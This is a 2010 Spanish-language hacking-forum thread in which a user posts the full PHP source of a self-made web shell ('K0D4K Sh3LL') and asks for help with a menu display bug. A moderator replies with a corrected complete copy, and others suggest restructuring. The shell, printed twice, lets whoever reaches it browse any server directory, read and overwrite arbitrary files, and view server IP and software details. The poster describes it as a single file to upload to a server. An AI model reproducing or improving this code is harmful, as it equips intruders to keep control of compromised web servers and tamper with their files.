elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  problema en codigo :(
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: problema en codigo :(  (Leído 4,683 veces)
Dr [F]

Desconectado Desconectado

Mensajes: 50


[H] Risk T [S] --> Dr [F]


Ver Perfil WWW
problema en codigo :(
« en: 1 Agosto 2010, 06:24 am »

Hola gente, estoy realizando una webshell y me surgio un problema, la webshell la pantalla principal consta de un menu para ver archivos info del servidor y creditos

bueno el problema es que cuando voy a la parte de de informacion del servidor se mete tambien lo que hay en menu :(
lo mejor va a ser que lo vean..
les dejo el codigo

Código
  1. <html>
  2. <head>
  3. <title> K0D4K Sh3LL! </title>
  4. <style type="text/css">
  5. body {
  6. background-color:#000000;
  7. cursor:crosshair;
  8.  
  9. font-family:monospace;
  10. }
  11.  
  12. datitos{
  13. color:FF0000;
  14. font-weight:bold;
  15. font-family:verdana;
  16. font-size:15px;
  17. }
  18.  
  19. carteles {
  20. font-size:20px;
  21. color:#FF8000;
  22. font-weight:bold;
  23. }
  24.  
  25. directorios{
  26. font-size:small;
  27. font-type:Comic Sans Ms;
  28. font-color:red;
  29. font-family:verdana;
  30. font-weight:bold;
  31. }
  32.  
  33. table
  34. {
  35. font-size:13px;
  36.  border-collapse: collapse;
  37. }
  38.  
  39. th
  40. {
  41.  border-right: 1px solid #000;
  42.  border-bottom: 1px solid #000;
  43.  padding: 0.5em;
  44.  background-color:#FF8000;
  45. }
  46.  
  47. corchetes {
  48. color:#FF0000;
  49. font-family:verdana;
  50. font-size:26px;
  51. font-weight:bold;
  52. font-style:italic;
  53. }
  54.  
  55. signos {
  56. font-weight:bold;
  57. color:#FF8000;
  58. font-size:24px;
  59. }
  60.  
  61. k{
  62. color:#FF0000;
  63. font-size:25px;
  64. font-weight:bold;
  65. font-style:italic;
  66. font-family:verdana;
  67. }
  68.  
  69. cero{
  70. color:#FF8000;
  71. font-size:23px;
  72. font-size:25px;
  73. font-weight:bold;
  74. font-style:italic;
  75. font-family:verdana;
  76. }
  77.  
  78. guion{
  79. color:#FF8000;
  80. font-size:25px;
  81. }
  82.  
  83.  
  84. a:link {
  85. font-size:15px;
  86. color:red;
  87. text-decoration:none;
  88. }
  89. a:visited{
  90. color:red;
  91. text-decoration:none;
  92. }
  93. a:hover {
  94. cursor:crosshair;
  95. color:orange;
  96. text-decoration:none;
  97. font-size:16px;
  98. }
  99.  
  100. datos{
  101. font-size:medium;
  102. color:#FF8000;
  103. font-family:verdana;
  104. }
  105.  
  106.  
  107. </style>
  108. <title> K0D4K Web Sh3LL! </title>
  109. </head>
  110. <body>
  111. <center>
  112. <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes>
  113. <k> K</k> <cero>0</cero> <k>D</k> <cero>4</cero> <k>K</k>   <guion>-</guion>   <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
  114.  <br><br>     <center>
  115.  
  116.    <center>     <br><br>
  117. <div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
  118. visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">
  119.  
  120. <center>         <br>
  121.  
  122. <a href="?shell=archivo"> Ver Archivos </a><br>
  123. <a href="?shell=datos"> Informacion Del Servidor </a><br>
  124. <a href="?shell=phpinfo"> Link3</a>  <br>
  125. <a href="?shell=creditos">Creditos</a>     <br>
  126.  
  127.  
  128. </div></center></center>
  129. <br>
  130.  
  131. <?php
  132.  
  133.  
  134.  
  135. if(isset($_GET['path'])) {
  136. $path = $_GET['path'];
  137. $dir = dir($path);
  138. }
  139. else {
  140. $path = getcwd();
  141. $dir = dir($path);
  142. }
  143. if($_GET['shell'] == "archivo" or $_GET['path']!== "") {
  144.  
  145. echo "<br>";
  146. echo "<div align=right>";
  147. echo "<table><tr>";
  148. echo "<th>Posicion:</th><th>";
  149. echo "$path";
  150. echo "</th>";
  151. echo "</table>";
  152. echo "</div>";
  153. echo "</chica>";
  154. echo "<br>";
  155.  
  156.           echo "<center>";
  157. echo "<carteles><br>";
  158. echo "Directorios:<br>";
  159. "</carteles>";
  160. $contador = 0;
  161. while ($file = $dir->read()) {
  162. $extension = filetype($path."/".$file);
  163. if ($extension == "dir") {
  164. $contador+=1;
  165. $ruta = urlencode($path."/".$file);
  166. echo "<directorios>";
  167. echo "<a href=?path=".$ruta.">".$file."</a><br>";
  168. }
  169. }
  170. echo "</directorios>";
  171.  
  172. echo "<br><br><carteles>";
  173. echo "Archivos:";
  174. echo "</carteles><br>";
  175. $dir->rewind();
  176. $contador=0;
  177. while($file = $dir->read()) {
  178. $extension=filetype($path."/".$file);
  179. if ($extension !=="dir") {
  180. $contador+=1;
  181. $ruta=urlencode($path."/".$file);
  182. echo "<directorios>";
  183. echo "<a href=?view=".$ruta.">".$file."</a><br>";}}
  184. if ($contador==0) {
  185. echo "No hay archivos en el directorio";
  186. }
  187. echo "<br><br>";
  188. echo "</center>";
  189. $dir->close();
  190. echo "</directorios>";
  191.  
  192.  
  193. if(isset($_GET['view'])) {
  194. $ruta = $_GET['view'];
  195. echo "<h2><font color=orange><center>";
  196. echo "Editando: $ruta";
  197. echo "</font></center></h2>";
  198. echo "<center>";
  199. echo "<form method=POST action=\"\">";
  200.  
  201. echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
  202. $abrir=fopen($ruta,"r");
  203. $texto = fread($abrir, filesize($ruta));
  204. echo htmlentities($texto);
  205. echo "</textarea></div>";
  206.  
  207. echo "<input type=submit name=\"Change\" value=\"Editar\">";
  208. echo "</form>";
  209. echo "</center>";
  210. if(isset($_POST['Change'])) {
  211. $arc=fopen($ruta, "w+");
  212. $txt=$_POST['modi'];
  213. @$ok = fwrite($arc,$txt);
  214. }
  215. }
  216. }
  217. ?>
  218. <?php
  219. if($_GET['shell']=="datos") {
  220. echo "<br><br><br>";
  221. $servers=$_SERVER['SERVER_SOFTWARE'];
  222. $ipserver=$_SERVER['SERVER_ADDR'];
  223. $lugarshell=$_SERVER['SCRIPT_FILENAME'];
  224. echo "<carteles>";
  225. echo "Datos del servidor:";
  226. echo "</carteles>";
  227.  
  228. echo "<br><br><br>";
  229. echo "<datos>";
  230. echo "Version de software: ";
  231. echo "</datos>";
  232. echo "<datitos>";
  233. echo $servers;
  234. echo "</datitos>";
  235. echo "</info>";
  236. echo "<br>";
  237. echo "<datos>";
  238. echo "IP del servidor: ";
  239. echo "</datos>";
  240. echo "<datitos>";
  241. echo $ipserver;
  242. echo "</datitos>";
  243. echo "<br>";
  244. echo "<datos>";
  245. echo "Directorio shell: ";
  246. echo "</datos>";
  247. echo "<datitos>";
  248. echo $lugarshell;
  249. echo "</datitos>";
  250. }
  251. ?>
  252. <?php
  253. if($_GET['shell'] == "creditos") {
  254. header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");
  255.  
  256. }
  257. ?>
  258. </body>
  259. </html>

muchas gracias


En línea

"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]
Ari Slash


Desconectado Desconectado

Mensajes: 1.783



Ver Perfil WWW
Re: problema en codigo :(
« Respuesta #1 en: 1 Agosto 2010, 06:48 am »

bueno tu codigo esmuy desordenado xD

intenta hacer algo asi modular, separa cada funcion en archivos distintos php
pero mantiene el menu de arriba

Código:
si get[shell]==archivo
   include archivo.php
si get[shell]==informacion
   include serverinfo.php
si get[shell]==blablabla
   include blabla.php


En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: problema en codigo :(
« Respuesta #2 en: 1 Agosto 2010, 07:27 am »

El problema que tienes radica en la siguiente linea de código
Código
  1. if($_GET['shell'] == "archivo" or $_GET['path']!== "") {
Donde realizas una comparación con la variable GET path, que si se encuentra vacía, muestre ciertos echos. Es decir, cambia esa linea por está
Código
  1. if($_GET['shell'] == "archivo") {

Te dejo el código completo, un poco más ordenado.
Código
  1. <html>
  2. <head>
  3. <title> K0D4K Sh3LL! </title>
  4. <style type="text/css">
  5. body {
  6. background-color:#000000;
  7. cursor:crosshair;
  8. font-family:monospace;
  9. }
  10. datitos{
  11. color:FF0000;
  12. font-weight:bold;
  13. font-family:verdana;
  14. font-size:15px;
  15. }
  16. carteles {
  17. font-size:20px;
  18. color:#FF8000;
  19. font-weight:bold;
  20. }
  21. directorios{
  22. font-size:small;
  23. font-type:Comic Sans Ms;
  24. font-color:red;
  25. font-family:verdana;
  26. font-weight:bold;
  27. }
  28. table{
  29. font-size:13px;
  30. border-collapse: collapse;
  31. }
  32. th{
  33. border-right: 1px solid #000;
  34. border-bottom: 1px solid #000;
  35. padding: 0.5em;
  36. background-color:#FF8000;
  37. }
  38. corchetes {
  39. color:#FF0000;
  40. font-family:verdana;
  41. font-size:26px;
  42. font-weight:bold;
  43. font-style:italic;
  44. }
  45. signos {
  46. font-weight:bold;
  47. color:#FF8000;
  48. font-size:24px;
  49. }
  50. k{
  51. color:#FF0000;
  52. font-size:25px;
  53. font-weight:bold;
  54. font-style:italic;
  55. font-family:verdana;
  56. }
  57. cero{
  58. color:#FF8000;
  59. font-size:23px;
  60. font-size:25px;
  61. font-weight:bold;
  62. font-style:italic;
  63. font-family:verdana;
  64. }
  65. guion{
  66. color:#FF8000;
  67. font-size:25px;
  68. }
  69. a:link {
  70. font-size:15px;
  71. color:red;
  72. text-decoration:none;
  73. }
  74. a:visited{
  75. color:red;
  76. text-decoration:none;
  77. }
  78. a:hover {
  79. cursor:crosshair;
  80. color:orange;
  81. text-decoration:none;
  82. font-size:16px;
  83. }
  84. datos{
  85. font-size:medium;
  86. color:#FF8000;
  87. font-family:verdana;
  88. }
  89. </style>
  90. <title> K0D4K Web Sh3LL! </title>
  91. </head>
  92. <body>
  93. <center>
  94. <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes>
  95. <k> K</k> <cero>0</cero> <k>D</k> <cero>4</cero> <k>K</k>   <guion>-</guion>   <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
  96.  <br><br>     <center>
  97.  
  98.    <center>     <br><br>
  99. <div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
  100. visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">
  101.  
  102. <center>         <br>
  103.  
  104. <a href="?shell=archivo"> Ver Archivos </a><br>
  105. <a href="?shell=datos"> Informacion Del Servidor </a><br>
  106. <a href="?shell=phpinfo"> Link3</a>  <br>
  107. <a href="?shell=creditos">Creditos</a>     <br>
  108.  
  109.  
  110. </div></center></center>
  111. <br>
  112.  
  113. <?php
  114. if(isset($_GET['path'])) {
  115. $path = $_GET['path'];
  116. $dir = dir($path);
  117. }else {
  118. $path = getcwd();
  119. $dir = dir($path);
  120. }
  121.  
  122. if($_GET['shell'] == "archivo") {
  123. echo "<br>";
  124. echo "<div align=right>";
  125. echo "<table><tr>";
  126. echo "<th>Posicion:</th><th>";
  127. echo "$path";
  128. echo "</th>";
  129. echo "</table>";
  130. echo "</div>";
  131. echo "</chica>";
  132. echo "<br>";
  133. echo "<center>";
  134. echo "<carteles><br>";
  135. echo "Directorios:<br>";
  136. echo "</carteles>";
  137. $contador = 0;
  138. while ($file = $dir->read()) {
  139. $extension = filetype($path."/".$file);
  140. if ($extension == "dir") {
  141. $contador+=1;
  142. $ruta = urlencode($path."/".$file);
  143. echo "<directorios>";
  144. echo "<a href=?path=".$ruta.">".$file."</a><br>";
  145. }
  146. }
  147. echo "</directorios>";
  148. echo "<br><br><carteles>";
  149. echo "Archivos:";
  150. echo "</carteles><br>";
  151. $dir->rewind();
  152. $contador=0;
  153. while($file = $dir->read()) {
  154. $extension=filetype($path."/".$file);
  155. if ($extension !=="dir"){
  156. $contador+=1;
  157. $ruta=urlencode($path."/".$file);
  158. echo "<directorios>";
  159. echo "<a href=?view=".$ruta.">".$file."</a><br>";
  160. }
  161. }
  162.  
  163. if ($contador==0) {
  164. echo "No hay archivos en el directorio";
  165. }
  166. echo "<br><br>";
  167. echo "</center>";
  168. $dir->close();
  169. echo "</directorios>";
  170.  
  171. if(isset($_GET['view'])) {
  172. $ruta = $_GET['view'];
  173. echo "<h2><font color=orange><center>";
  174. echo "Editando: $ruta";
  175. echo "</font></center></h2>";
  176. echo "<center>";
  177. echo "<form method=POST action=\"\">";
  178. echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
  179. $abrir=fopen($ruta,"r");
  180. $texto = fread($abrir, filesize($ruta));
  181. echo htmlentities($texto);
  182. echo "</textarea></div>";
  183.  
  184. echo "<input type=submit name=\"Change\" value=\"Editar\">";
  185. echo "</form>";
  186. echo "</center>";
  187. if(isset($_POST['Change'])) {
  188. $arc=fopen($ruta, "w+");
  189. $txt=$_POST['modi'];
  190. @$ok = fwrite($arc,$txt);
  191. }
  192. }
  193. }
  194.  
  195. if($_GET['shell']=="datos") {
  196. echo "<br><br><br>";
  197. $servers=$_SERVER['SERVER_SOFTWARE'];
  198. $ipserver=$_SERVER['SERVER_ADDR'];
  199. $lugarshell=$_SERVER['SCRIPT_FILENAME'];
  200. echo "<carteles>";
  201. echo "Datos del servidor:";
  202. echo "</carteles>";
  203. echo "<br><br><br>";
  204. echo "<datos>";
  205. echo "Version de software: ";
  206. echo "</datos>";
  207. echo "<datitos>";
  208. echo $servers;
  209. echo "</datitos>";
  210. echo "</info>";
  211. echo "<br>";
  212. echo "<datos>";
  213. echo "IP del servidor: ";
  214. echo "</datos>";
  215. echo "<datitos>";
  216. echo $ipserver;
  217. echo "</datitos>";
  218. echo "<br>";
  219. echo "<datos>";
  220. echo "Directorio shell: ";
  221. echo "</datos>";
  222. echo "<datitos>";
  223. echo $lugarshell;
  224. echo "</datitos>";
  225. }
  226.  
  227. if($_GET['shell'] == "creditos") {
  228. header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");
  229.  
  230. }
  231. ?>
  232. </body>
  233. </html>
Edit: Tú WEBSHELL tiene XSS. xD
« Última modificación: 1 Agosto 2010, 07:34 am por Shell Root » En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Dr [F]

Desconectado Desconectado

Mensajes: 50


[H] Risk T [S] --> Dr [F]


Ver Perfil WWW
Re: problema en codigo :(
« Respuesta #3 en: 1 Agosto 2010, 07:42 am »

gracias por las rapidas respuestas, yo habia hecho lo mismo que tu shell root, va, esa fue mi primer idea, pero al ver lo que pasaba intente meter otra cosa..

lo que pasa con eso es que cuando intentas navegar por los directorios, te lleva a la pagina principal, osea no navega por los directorio..

Código:
si get[shell]==archivo
   include archivo.php
si get[shell]==informacion
   include serverinfo.php
si get[shell]==blablabla
   include blabla.php

Eso estaria bueno, pero en una webshell no puedo subir muchos archivos al servidor, la gracia de la webshell es que sea un solo archivo :)

saludos
En línea

"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]
Ari Slash


Desconectado Desconectado

Mensajes: 1.783



Ver Perfil WWW
Re: problema en codigo :(
« Respuesta #4 en: 1 Agosto 2010, 07:43 am »

>:D
En línea

Dr [F]

Desconectado Desconectado

Mensajes: 50


[H] Risk T [S] --> Dr [F]


Ver Perfil WWW
Re: problema en codigo :(
« Respuesta #5 en: 1 Agosto 2010, 07:50 am »

¿? jajjaja que fue esa cara xD
En línea

"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]
Zazú

Desconectado Desconectado

Mensajes: 116


Ver Perfil
Re: problema en codigo :(
« Respuesta #6 en: 1 Agosto 2010, 07:57 am »

No entiendo el sentido de usar varios if cuando podes usar una función para eso...
 :silbar:
Switch()
http://php.net/manual/es/control-structures.switch.php


Ejemplo:
Código
  1. switch($_GET[algo]){
  2. case hola:
  3. echo 'Chau';
  4. break;
  5. case chau:
  6. echo 'Hola';
  7. break;
  8. default:
  9. echo 'pagina principal';
  10. }
  11.  
  12.  
Espero que te sirva    ;)


Y no hay necesidad de subir varios archivos al servidor, aun que estes usando if, dependiendo el caso pones el codigo php que se ejecute, pero de forma ordenada   :silbar:

Suerte, cualquier cosa mandame un privado  ;)
« Última modificación: 1 Agosto 2010, 07:59 am por Zazú » En línea

Dr [F]

Desconectado Desconectado

Mensajes: 50


[H] Risk T [S] --> Dr [F]


Ver Perfil WWW
Re: problema en codigo :(
« Respuesta #7 en: 1 Agosto 2010, 13:40 pm »

ya conozco el tema del switch :) muchas gracias, pero el error sigue saliendo igual, sospecho que nadie se molesto en compilar el script y ver que pasa :/

saludos

PD: sigue estando el mismo error
En línea

"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: problema en codigo :(
« Respuesta #8 en: 1 Agosto 2010, 20:31 pm »

...sospecho que nadie se molesto en compilar el script y ver que pasa :/
Sospechas bien ;). Creo que deberías de leer esto y reestructurar la idea de la WebShell.
:http://foro.portalhacker.net/index.php/topic,70671.0.html
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Ari Slash


Desconectado Desconectado

Mensajes: 1.783



Ver Perfil WWW
Re: problema en codigo :(
« Respuesta #9 en: 2 Agosto 2010, 06:00 am »

yo si lo probe cuado postie xD
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[C] Problema GNUPlot con código C
Programación C/C++
valen7valverde 0 2,337 Último mensaje 8 Mayo 2020, 04:31 am
por valen7valverde
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines